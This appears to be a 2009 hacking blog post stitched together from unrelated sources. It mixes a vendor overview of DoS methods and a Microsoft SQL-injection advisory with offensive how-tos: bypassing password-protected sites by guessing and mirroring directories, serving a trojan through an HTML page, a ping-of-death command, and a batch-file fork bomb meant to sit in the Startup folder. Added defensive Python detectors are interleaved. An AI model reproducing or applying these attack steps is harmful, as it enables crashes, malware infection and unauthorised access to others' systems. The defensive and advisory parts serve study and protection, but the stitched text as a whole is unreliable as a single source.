
attack method(5)

Saturday, October 17, 2009 , Posted by hang at 6:13 AM

Seven Common DoS Attack Methods

Hackers have an arsenal of methods for launching Denial of Service (DoS) attacks. The following seven sections highlight the extent of the problem faced by organizations trying to combat the DoS threat. TippingPoint provides solutions to counter these common methods of DDoS attack:

- Vulnerabilities
- Zombie Recruitment
- Attack Tools
- Bandwidth Attacks
- SYN Floods
- Established Connection Floods
- Connections-Per-Second Floods

Method 1 - Vulnerabilities

Attackers can attempt to crash a service or the underlying operating system directly over a network. These attacks disable services by exploiting buffer overflows and other exploitable flaws that exist in vulnerable servers. Vulnerability attacks do not require extensive resources or bandwidth to carry out; attackers only need to know of the existence of a vulnerability to be able to exploit it and cause widespread damage. Once an attacker has control of a vulnerable service, application, or operating system, they use that foothold to disable systems and ultimately crash an entire network from within.

Method 2 - Zombie Recruitment

The same vulnerabilities used to crash a server allow hackers to turn vulnerable PCs into Distributed Denial of Service zombies. Once the hacker exploits the vulnerability to gain control of the system, they plant a backdoor into the system for later use in committing DDoS attacks. The Trojan or similar infection provides a path into the system. Once the attacker has the path, they remotely control the system, making the server a "Zombie" that waits for the attack command. Using these zombies, attackers can launch a huge number of DoS and DDoS attacks anonymously. Viruses can also be used for Zombie recruitment. For instance, the MyDoom virus was designed to convert PCs into Zombies that attacked SCO and Microsoft at a predetermined time programmed into the virus. Other viruses install backdoors that let hackers launch coordinated attacks, increasing the distribution of the attacks across networks around the globe. The following figures detail how attackers create and launch these attacks against a network.

Method 3 - Attack Tools
After recruiting zombies, hackers use covert communication channels to contact and control their zombie armies. They can choose from hundreds of off-the-shelf backdoor programs and custom tools available from websites. These tools and programs launch the attacks that penetrate and control networks, turning them into zombie armies used to launch further attacks from within. Once they have the zombie systems, they can use other tools to send a single command to all zombies simultaneously. In some cases, commands are carried in ICMP or UDP packets that can bypass firewalls. In other cases, the zombie "phones home" by making a TCP connection to the master. Once the connection is created, the master can control the Zombie.

The tools used to attack and control systems comprise:

- Tribe Flood Network (TFN) - Focuses on Smurf, UDP, SYN, and ICMP echo request floods.
- Tribe Flood Network 2000 (TFN2K) - The updated version of TFN.
- Trinoo - Focuses on UDP floods. Sends UDP packets to random destination ports. The packet size is configurable.
- Stacheldraht - Software tool that focuses on TCP, ACK, TCP NULL, HAVOC, DNS floods, and TCP packet floods with random headers.

These tools are evolving both in the sophistication of their covert channels and in their DDoS flooding methods. New tools use random port numbers or operate over IRC. Further, smarter tools cleverly disguise flooding packets as legitimate service requests and/or introduce a high degree of randomness. These improvements make it increasingly hard for a port-filtering device to separate attack packets from legitimate traffic.

Method 4 - Bandwidth Attacks
When a DDoS attack is launched, it can often be detected as a significant change in the statistical composition of the network traffic. For example, a typical system might consist of 80 percent TCP and a 20 percent mix of UDP and ICMP. A change in the statistical mix can be a signal of a new attack. For example, the Slammer worm resulted in a surge of UDP packets, whereas the Welchia worm produced a flood of ICMP packets. Such surges can be DDoS attacks or so-called zero-day attacks, attacks that exploit previously unknown vulnerabilities.
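The statistical-mix signal described above, as an added example that is not code from the original post or from TippingPoint: it keeps the 80/20 baseline from the text and flags any time window whose protocol share jumps, the way a Slammer-style UDP surge or a Welchia-style ICMP surge would. The packet summaries, the 15/5 split of the UDP/ICMP share and the 60 s window are constructed assumptions.

```python
"""Protocol-mix shift detector for the bandwidth-attack method above.

Added example, not code from the original post or from TippingPoint. The packet
summaries, the 15/5 split of the UDP/ICMP share and the 60 s window are
constructed assumptions for the example.
"""
from collections import Counter

# Baseline share per protocol (the text gives 80/20; the 15/5 split is assumed).
BASELINE = {"TCP": 0.80, "UDP": 0.15, "ICMP": 0.05}
WINDOW_SECONDS = 60


def burst(t0, proto, n):
    """Constructed input: n packets of one protocol spread over [t0, t0 + 60)."""
    return [(t0 + (i % 60), proto) for i in range(n)]


# Constructed packet summaries as (timestamp_seconds, protocol).
PACKETS = (
    burst(0, "TCP", 160) + burst(0, "UDP", 30) + burst(0, "ICMP", 10)           # window 0: baseline mix
    + burst(60, "TCP", 160) + burst(60, "UDP", 30) + burst(60, "ICMP", 10)      # window 1: baseline mix
    + burst(120, "TCP", 160) + burst(120, "UDP", 2000) + burst(120, "ICMP", 10) # window 2: UDP surge
)


def window_mix(packets, window=WINDOW_SECONDS):
    """Return {window_index: {protocol: share_of_packets}} for every window seen."""
    counts = {}
    for ts, proto in packets:
        counts.setdefault(ts // window, Counter())[proto] += 1
    return {
        w: {p: n / sum(c.values()) for p, n in c.items()}
        for w, c in sorted(counts.items())
    }


def flag_surges(mix, baseline=BASELINE, max_rise=0.25):
    """Return (window, protocol, rise) for every protocol whose share rose more
    than max_rise above its baseline. The surge in one protocol is the signal
    the text describes; the matching fall in the others is implied and not
    reported separately."""
    alerts = []
    for w, shares in mix.items():
        for proto, share in sorted(shares.items()):
            rise = share - baseline.get(proto, 0.0)
            if rise > max_rise:
                alerts.append((w, proto, round(rise, 2)))
    return alerts


if __name__ == "__main__":
    for window, proto, rise in flag_surges(window_mix(PACKETS)):
        print(f"window {window}: {proto} share {rise:+.2f} above baseline")
```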

Method 5 - SYN Flood
One of the most common types of DoS attacks is the SYN Flood. This attack can be launched from one or more attacker machines to disable access to a target server. The attack exploits the mechanism used to establish a TCP connection. Every TCP connection requires the completion of a three-way handshake before it can pass data:

- Connection Request - First packet (SYN) sent from the requester to the server, initiating the three-way handshake
- Request Acknowledgement - Second packet (SYN+ACK) sent from the server to the requester
- Connection Complete - Third packet (ACK) sent from the requester back to the server, completing the three-way handshake

The attack consists of a flood of invalid SYN packets with spoofed source IP addresses. The spoofed source address causes the target server to respond to the SYN with a SYN-ACK to an unsuspecting or nonexistent source machine. The target then waits for an ACK packet from the source to complete the connection. The ACK never comes, and the connection table is tied up with a pending connection request that never completes. The table will quickly fill up and consume all available resources with invalid requests. While the number of connection entries may differ from one server to another, tables may fill up with only hundreds or thousands of requests. The result is a denial of service since, once a table is full, the target server is unable to service legitimate requests.

The difficulty with SYN attacks is that each request in isolation looks benign. An invalid request is very hard to distinguish from a legitimate one.
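The handshake and the half-open backlog described above, replayed as an added example that is not code from the original post or from TippingPoint: it tracks each connection through SYN, SYN-ACK and ACK and counts, per server, the entries stuck waiting for an ACK that never arrives. The addresses, ports and the backlog limit of 128 are assumptions.

```python
"""Half-open connection tracker for the SYN Flood method above.

Added example, not code from the original post or from TippingPoint. The
addresses, ports and the backlog limit are constructed assumptions.
"""
from collections import defaultdict

# Constructed packet summaries: (src_ip, src_port, dst_ip, dst_port, flags).
LEGIT = [
    ("10.0.0.5", 40001, "192.0.2.10", 80, "SYN"),
    ("192.0.2.10", 80, "10.0.0.5", 40001, "SYN-ACK"),
    ("10.0.0.5", 40001, "192.0.2.10", 80, "ACK"),  # handshake completes
]


def spoofed_syns(n):
    """Constructed flood: n SYNs from spoofed sources. The server answers each
    with a SYN-ACK sent to a host that never asked, so no ACK ever follows."""
    packets = []
    for i in range(1, n + 1):
        src, sport = f"203.0.113.{i % 254 + 1}", 1024 + i
        packets.append((src, sport, "192.0.2.10", 80, "SYN"))
        packets.append(("192.0.2.10", 80, src, sport, "SYN-ACK"))
    return packets


def track_handshakes(packets):
    """Replay packets; return {(client, cport, server, sport): state} where state
    is SYN_SENT, SYN_RECV (server replied, awaiting ACK) or ESTABLISHED."""
    state = {}
    for src, sport, dst, dport, flags in packets:
        if flags == "SYN":
            state[(src, sport, dst, dport)] = "SYN_SENT"
        elif flags == "SYN-ACK":
            key = (dst, dport, src, sport)  # reply travels server -> client
            if state.get(key) == "SYN_SENT":
                state[key] = "SYN_RECV"
        elif flags == "ACK":
            key = (src, sport, dst, dport)
            if state.get(key) == "SYN_RECV":
                state[key] = "ESTABLISHED"
    return state


def half_open_by_server(state):
    """Count SYN_RECV entries per (server_ip, server_port): the table a flood fills."""
    counts = defaultdict(int)
    for (_client, _cport, server, sport), s in state.items():
        if s == "SYN_RECV":
            counts[(server, sport)] += 1
    return dict(counts)


def flood_suspected(state, backlog_limit=128):
    """Servers whose half-open backlog exceeds backlog_limit. Each SYN looks
    benign on its own, as the text says, so the aggregate count is the signal."""
    return [srv for srv, n in half_open_by_server(state).items() if n > backlog_limit]


if __name__ == "__main__":
    st = track_handshakes(LEGIT + spoofed_syns(300))
    print(half_open_by_server(st), flood_suspected(st))
```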


Method 6 - Established Connection Flood

An Established Connection Flood is an evolution of the SYN Flood attack that employs an array of zombies to commit a DDoS attack on a target. Zombies establish seemingly legitimate connections to the target server. By using a large number of zombies, each creating a large number of connections to the target, an attacker can create so many connections that the target is no longer able to respond to legitimate connection requests. For example, if a thousand zombies each make a thousand connections to a target server, the server must handle a million open connections. The result is similar to a SYN Flood attack in that it consumes server resources, but it is even more difficult to detect.

Method 7 - Connections Per Second Floods
Connections Per Second (CPS) Flood attacks flood servers with a high rate of connections from an apparently valid source. In these attacks, an attacker or army of zombies attempts to drain server resources by rapidly setting up and tearing down TCP connections, perhaps initiating a request on each connection. For example, an attacker might use his zombie army to repeatedly fetch the home page from a target web server. The resulting load makes the server extremely sluggish.

1. SQL injection

SQL Injection : "The act of entering malformed or unexpected data (perhaps into a front-end web form or front-end application for example) so that the back-end SQL database running behind the website or application executes SQL commands that the programmer never intended to permit, possibly allowing an intruder to break into or damage the database."

The MSRC released an advisory recently that discusses the recent SQL injection attacks and announces three new tools to help identify and block these types of vulnerabilities. The advisory discusses the new tools, the purpose of each, and the way each complements the others. The goal of this blog post is to help you identify the best tool to use depending on your role (i.e. Web Developers vs. IT administrators).

Web Developers Recommendations

* The Microsoft Source Code Analyzer for SQL Injection (MSCASI) is a static code analysis tool that identifies SQL Injection vulnerabilities in ASP code (ASP pages are the ones that have been under attack). In order to run MSCASI you will need source code access and MSCASI will output areas vulnerable to SQL injection (i.e. the root cause and vulnerable path is identified). In our view, fixing the root cause of the bug is the best way to eradicate vulnerabilities. MSCASI scans ASP source code and generates warnings for first order and second order SQL Injection vulnerabilities. Please refer to the SQL team’s blog and KB 954476 for more details.

IT/Database Administrators Recommendations (as well as Web developers)

We are recommending two of the new tools announced today. One can help identify SQL injection vulnerabilities by crawling the website. The other one aims to block potential SQL injection attacks by filtering malicious requests. The website crawler will be useful if you don't have access to the source code.

* Microsoft worked with the HP Web Security Research group to release the Scrawlr tool. The tool will crawl a website, simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities. Scrawlr uses some of the same technology found in HP WebInspect but has been built to focus only on SQL Injection vulnerabilities. This will allow an IT/DB admin to easily find vulnerabilities similar to the ones that have been used to compromise sites in recent attacks. No source code is required to run this tool. From a starting URL, the tool recursively crawls that URL in order to build up a site tree that will be then analyzed for SQL injection vulnerabilities. For more information check out the HP Web Security Research blog.

* In order to block and mitigate SQL injection attacks (while the root cause is being fixed), you can also deploy SQL filters using a new release of URLScan 3.0. This tool restricts the types of HTTP requests that Internet Information Services (IIS) will process. By blocking specific HTTP requests, UrlScan helps prevent potentially harmful requests from being executed on the server. It uses a set of keywords to block certain requests. If a bad request is detected, the filter will drop the request and it will not be processed by SQL. That said, if a SQL injection flaw has been identified, we highly encourage you to fix the root cause of the problem instead of attempting to produce the perfect filter (since in our view this is error prone). Please refer to one of the two IIS blog posts (1, 2) and the technical documentation for more details.
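The root cause the post keeps pointing back to, shown as an added example that is not from the MSRC post or its tools: a lookup that splices user input into the SQL text (the first-order pattern MSCASI reports) beside the same lookup with a bound parameter. Python's sqlite3 stands in for ASP and SQL Server so it runs stand-alone; the table, rows and malformed input are constructed.

```python
"""SQL injection root cause beside its fix, for the definition above.

Added example, not from the MSRC post. sqlite3 stands in for the ASP/SQL Server
stack the post discusses; the table, rows and inputs are constructed.
"""
import sqlite3


def make_db():
    """Constructed table with two users; a name lookup should match at most one."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cr3t"), ("bob", "hunter2")])
    return conn


def query_concat(conn, name):
    """Root cause: untrusted input becomes part of the SQL statement text,
    so malformed input changes what the statement means."""
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def query_param(conn, name):
    """Fix: the same lookup with a bound parameter. The input is passed to the
    database as data, never parsed as SQL, whatever it contains."""
    sql = "SELECT name FROM users WHERE name = ?"
    return [row[0] for row in conn.execute(sql, (name,))]


# Constructed malformed input of the kind the definition above describes.
MALFORMED = "x' OR 'a'='a"

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", query_concat(db, MALFORMED))  # returns every row
    print("parameterized:", query_param(db, MALFORMED))  # returns no row
```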

Tool Name 1: MSCASI
Usage: Identifies SQL Injection vulnerabilities in ASP code through static source code analysis.
Pros: Identifies the root cause of the bug at the source code level.
Cons: This version currently only works on ASP pages.
For: Web developers

Tool Name 2: Scrawlr
Usage: Detects SQL injection vulnerabilities using runtime analysis by crawling a website.
Pros: No source code is required.
Cons: Cannot identify the line of code responsible.
For: IT/DB administrators, Web developers

Tool Name 3: UrlScan v3.0 Beta
Usage: Runtime filtering that blocks the types of HTTP requests that Internet Information Services (IIS) will process.
Pros: The URLScan filter can be easily deployed to mitigate SQL injection attacks while the root cause is being fixed.
Cons: Does not fix the root cause, so the risk has not been eliminated completely.
For: IT administrators

 

2. Hacking Password Protected Websites

warning : For educational purpose only

I know this is lame but just would like to share with you.
Have nothing for the next half an hour so typing it.. lol


There are many ways to defeat java-script protected websites. Some are very simplistic, such as hitting [ctrl-alt-del] when the password box is displayed, to simply turning off java capability, which will dump you into the default page. You can try manually searching for other directories, by typing the directory name into the url address box of your browser, i.e.: you want access to www.target.com.

Try typing www.target.com/images (almost every web site has an images directory). This will put you into the images directory, and give you a text list of all the images located there. Often, the title of an image will give you a clue to the name of another directory. i.e.: in www.target.com/images, there is a .gif named gamestitle.gif. There is a good chance then, that there is a 'games' directory on the site, so you would then type in www.target.com/games, and if it is a valid directory, you again get a text listing of all the files available there.

For a more automated approach, use a program like WEB SNAKE from anawave, or Web Wacker. These programs will create a mirror image of an entire web site, showing all directories, or even mirror a complete server. They are indispensable for locating hidden files and directories. What do you do if you can't get past an opening "Password Required" box? First do a WHOIS Lookup for the site. In our example, www.target.com. We find it's hosted by www.host.com at 100.100.100.1.

We then go to 100.100.100.1, and then launch Web Snake, and mirror the entire server. Set Web Snake to NOT download anything over about 20K (not many HTML pages are bigger than this). This speeds things up some, and keeps you from getting a lot of files and images you don't care about. This can take a long time, so consider running it right before bed time. Once you have an image of the entire server, you look through the directories listed, and find /target. When we open that directory, we find its contents, and all of its sub-directories listed. Let's say we find /target/games/zip/zipindex.html. This would be the index page that would be displayed had you gone through the password procedure, and allowed it to redirect you here. By simply typing in the url www.target.com/games/zip/zipindex.html you will be on the index page and ready to follow the links for downloading.



3. TROJAN ATTACK THROUGH HTML

This was a normal html code which would create a simple webpage.

Now what you have to do is:
upload the server file of your trojan to some webhosting, then change the link of the server file in the code, then save this code as "index.html" and upload it to the same host.

All done, now every time someone opens that webpage they would be infected with your trojan's server :)
http://tinypaste.com/6b4b3

expecting good replies



4. dos attacks or denial of services attack

dos attacks or denial of service attacks have become very common amongst hackers
who use them as a path to fame and respect in the underground groups of the
internet. denial of service attacks basically mean denying valid internet and
network users the use of the services of the target network or server. it
basically means launching an attack which will temporarily make the services
offered by the network unusable by legitimate users.
in other words one can describe a dos attack by saying that a dos attack is one
in which you clog up so much memory on the target system that it cannot serve
legitimate users, or you send the target system data packets which cannot be
handled by it and thus cause it to either crash, reboot or more commonly deny
services to legitimate users.
dos attacks are of the following different types-:
1. those that exploit vulnerabilities in the tcp/ip protocols suite.
2. those that exploit vulnerabilities in the ipv4 implementation.
3. there are also some brute force attacks, which try to use up all
resources of the target system and make the services unusable.
before i go on with dos attacks, let me explain some vulnerabilities in tcp/ip
itself. some common vulnerabilities are ping of death, teardrop, syn attacks and
land attacks.
ping of death
this vulnerability is quite well known and was earlier commonly used to hang
remote systems (or even force them to reboot) so that no users can use its
services. this exploit no longer works, as almost all system administrators
would have upgraded their systems making them safe from such attacks.
in this attack, the target system is pinged with a data packet that exceeds the
maximum bytes allowed by tcp/ip, which is 65 536. this would have almost always
caused the remote system to hang, reboot or crash. this dos attack could be
carried out even through the command line, in the following manner:
the following ping command creates a giant datagram of the size 65540 for ping.
it might hang the victim's computer:
c:\windows>ping -l 65540
teardrop
the teardrop attack exploits the vulnerability present in the reassembling of
data packets. whenever data is being sent over the internet, it is broken down
into smaller fragments at the source system and put together at the destination
system. say you need to send 4000 bytes of data from one system to the other,
then not all of the 4000 bytes is sent at one go. this entire chunk of data is
first broken down into smaller parts and divided into a number of packets, with
each packet carrying a specified range of data. for example, say 4000 bytes is
divided into 3 packets, then:
the first packet will carry data from 1 byte to 1500 bytes
the second packet will carry data from 1501 bytes to 3000 bytes
the third packet will carry data from 3001 bytes to 4000 bytes
these packets have an offset field in their tcp header part. this offset field
specifies from which byte to which byte that particular data packet carries
data, or the range of data that it is carrying. this along with the sequence
numbers helps the destination system to reassemble the data packets in the
correct order. now in this attack, a series of data packets are sent to the
target system with overlapping offset field values. as a result, the target
system is not able to reassemble the packets and is forced to crash, hang or
reboot.
say for example, consider the following scenario-: (note: _ _ _ = 1 data packet)
normally a system receives data packets in the following form, with no
overlapping offset values.
_ _ _                _ _ _                  _ _ _
(1 to 1500 bytes)    (1501 to 3000 bytes)   (3001 to 4500 bytes)
now in a teardrop attack, the data packets are sent to the target computer in
the following format:
_ _ _                _ _ _                  _ _ _
(1 to 1500 bytes)    (1500 to 3000 bytes)   (1001 to 3600 bytes)
when the target system receives something like the above, it simply cannot
handle it and will crash or hang or reboot.
syn attack
the syn attack exploits tcp/ip's three-way handshake. thus in order to
understand as to how syn attacks work, you need to first know how tcp/ip
establishes a connection between two systems. whenever a client wants to
establish a connection with a host, then three steps take place. these three
steps are referred to as the three-way handshake.
in a normal three way handshake, what happens is that the client sends a syn
packet to the host, and the host replies to this packet with a syn ack packet. then
the client responds with an ack (acknowledgement) packet. this will be clearer
after the following depiction of these steps-:
client --------syn packet--------------> Host
in the first step the client sends a syn packet to the host, with whom it wants
to establish a three-way connection. the syn packet requests the remote system
for a connection. it also contains the initial sequence number or isn of the
client, which is needed by the host to put back the fragmented data in the
correct sequence.
host -------------syn/ack packet----------> Client
in the second step, the host replies to the client with a syn/ack packet. this
packet acknowledges the syn packet sent by the client and sends the client its
own isn.
client --------------ack-----------------------> Host
in the last step the client acknowledges the syn/ack packet sent by the host by
replying with an ack packet.
these three steps together are known as the 3-way handshake and only when they
are completed is a complete tcp/ip connection established.
in a syn attack, several syn packets are sent to the server but all these syn
packets have a bad source ip address. when the target system receives these syn
packets with bad ip addresses, it tries to respond to each one of them with a
syn ack packet. now the target system waits for an ack message to come from the
bad ip address. however, as the bad ip does not actually exist, the target
system never actually receives the ack packet. it thus queues up all these
requests until it receives an ack message. the requests are not removed unless
and until, the remote target system gets an ack message. hence these requests
take up or occupy valuable resources of the target machine.
to actually affect the target system, a large number of syn packets with bad
source ips have to be sent. as these packets have a bad source ip, they queue up,
use up resources and memory of the target system and eventually crash, hang or
reboot the system.
land attacks
a land attack is similar to a syn attack, the only difference being that instead
of a bad ip address, the ip address of the target system itself is used. this
creates an infinite loop between the target system and the target system itself.
however, almost all systems have filters or firewalls against such attacks.
smurf attacks
a smurf attack is a sort of brute force dos attack, in which a huge number of
ping requests are sent to a system (normally the router) in the target network,
using spoofed ip addresses from within the target network. as and when the
router gets a ping message, it will route it or echo it back, in turn flooding
the network with packets, and jamming the traffic. if there are a large number
of nodes, hosts etc in the network, then it can easily clog the entire network
and prevent any use of the services provided by it.
read more about the smurf attacks at cert:
http://www.cert.org/advisories/ca-98.01.smurf.html
udp flooding
this kind of flooding is done against two target systems and can be used to stop
the services offered by any of the two systems. both of the target systems are
connected to each other, one generating a series of characters for each packet
received or in other words, requesting udp character generating service while
the other system, echoes all characters it receives. this creates an infinite
non-stopping loop between the two systems, making them useless for any data
exchange or service provision.
distributed dos attacks
dos attacks are not new; in fact they have been around for a long time. however
there has been a recent wave of distributed denial of services attacks which
pose a great threat to security and are on the verge of overtaking
viruses/trojans to become the deadliest threat to internet security. now you
see, in almost all of the above tcp/ip vulnerabilities, which are being
exploited by hackers, there is a huge chance of the target's system
administrator or the authorities tracing the attacks and getting hold of the
attacker.
now what is commonly being done is, say a group of 5 hackers join and decide to
bring a fortune 500 company's server down. now each one of them breaks into a
smaller less protected network and takes over it. so now they have 5 networks
and supposing there are around 20 systems in each network, it gives these
hackers, around 100 systems in all to attack from. so they, sitting on their home
computer, connect to the hacked less protected network, install a denial of
service tool on these hacked networks and using these hacked systems in the
various networks launch attacks on the actual fortune 500 company. this makes
the hackers less easy to detect and helps them to do what they wanted to do
without getting caught. as they have full control over the smaller less
protected network they can easily remove all traces before the authorities get
there.
not even a single system connected to the internet is safe from such ddos
attacks. all platforms including unix, windows nt are vulnerable to such
attacks. even macos has not been spared, as some of them are being used to
conduct such ddos attacks.
end of dos attack....
p.humayun khan
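The teardrop section above turns on a reassembler trusting overlapping offsets. As an added example that is not code from the post, here is a fragment-offset check that accepts the byte ranges the post shows as normal (1-1500, 1501-3000, 3001-4500), rejects the teardrop series (1-1500, 1500-3000, 1001-3600) with a reason instead of crashing, and only concatenates payloads once the ranges are contiguous. The range lists and payload bytes are constructed.

```python
"""Fragment-offset sanity check for the teardrop section above.

Added example, not code from the post. Byte ranges are 1-based and inclusive,
matching the post's notation; the range lists and payloads are constructed.
"""


def check_fragments(fragments):
    """fragments: list of (first_byte, last_byte), in any arrival order.
    Returns (ok, reason); ok is False for an overlap, a gap or a bad length,
    so the caller can drop the datagram rather than reassemble it."""
    ordered = sorted(fragments)
    expected_start = 1
    for first, last in ordered:
        if last < first:
            return False, f"fragment {first}-{last} has negative length"
        if first < expected_start:
            # Teardrop case: this fragment re-covers bytes an earlier one supplied.
            return False, f"fragment {first}-{last} overlaps data up to {expected_start - 1}"
        if first > expected_start:
            return False, f"gap before fragment {first}-{last}"
        expected_start = last + 1
    return True, f"contiguous, {expected_start - 1} bytes"


def reassemble(fragments, payloads):
    """Concatenate payloads in offset order, but only after check_fragments
    accepted the offsets; otherwise raise instead of building a bad buffer."""
    ok, reason = check_fragments(fragments)
    if not ok:
        raise ValueError(reason)
    return b"".join(p for _, p in sorted(zip(fragments, payloads)))


# The two series drawn in the post's diagram.
NORMAL = [(1, 1500), (1501, 3000), (3001, 4500)]
TEARDROP = [(1, 1500), (1500, 3000), (1001, 3600)]

if __name__ == "__main__":
    print(check_fragments(NORMAL))    # (True, 'contiguous, 4500 bytes')
    print(check_fragments(TEARDROP))  # (False, 'fragment 1001-3600 overlaps data up to 1500')
```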


5.How to crash a computer in less than 20 secs:

open a text document and put this in it:
@ECHO OFF
:loop
start cmd.exe
goto loop
Save this as test.bat in a safe place. Run it and the computer will crash. Put it in the StartUp
folder and the computer will crash every time it starts. DAMN IM EVIL :D

 
